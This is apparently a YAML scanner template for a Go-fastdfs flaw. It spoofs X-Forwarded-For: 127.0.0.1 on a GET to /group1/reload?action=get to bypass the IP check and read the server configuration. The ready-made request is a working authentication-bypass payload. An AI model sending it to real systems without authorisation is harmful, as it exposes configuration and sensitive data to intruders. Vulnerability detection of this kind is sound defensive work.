id: go-fastdfs-unauth

info:
  name: Go-fastdfs GetClientIp 未授权访问漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    Go-fastdfs GetClientIp方法存在XFF头绕过漏洞，攻击者通过漏洞可以未授权调用接口，获取配置文件等敏感信息
    "go-fastdfs"

rules:
  r0:
    request:
      method: GET
      path: /group1/reload?action=get
      headers:
        X-Forwarded-For: 127.0.0.1
    expression: response.status == 200 && response.body.bcontains(b'"download_domain":') && response.body.bcontains(b'"download_use_token":') && response.body.bcontains(b'"default_scene":')
expression: r0()
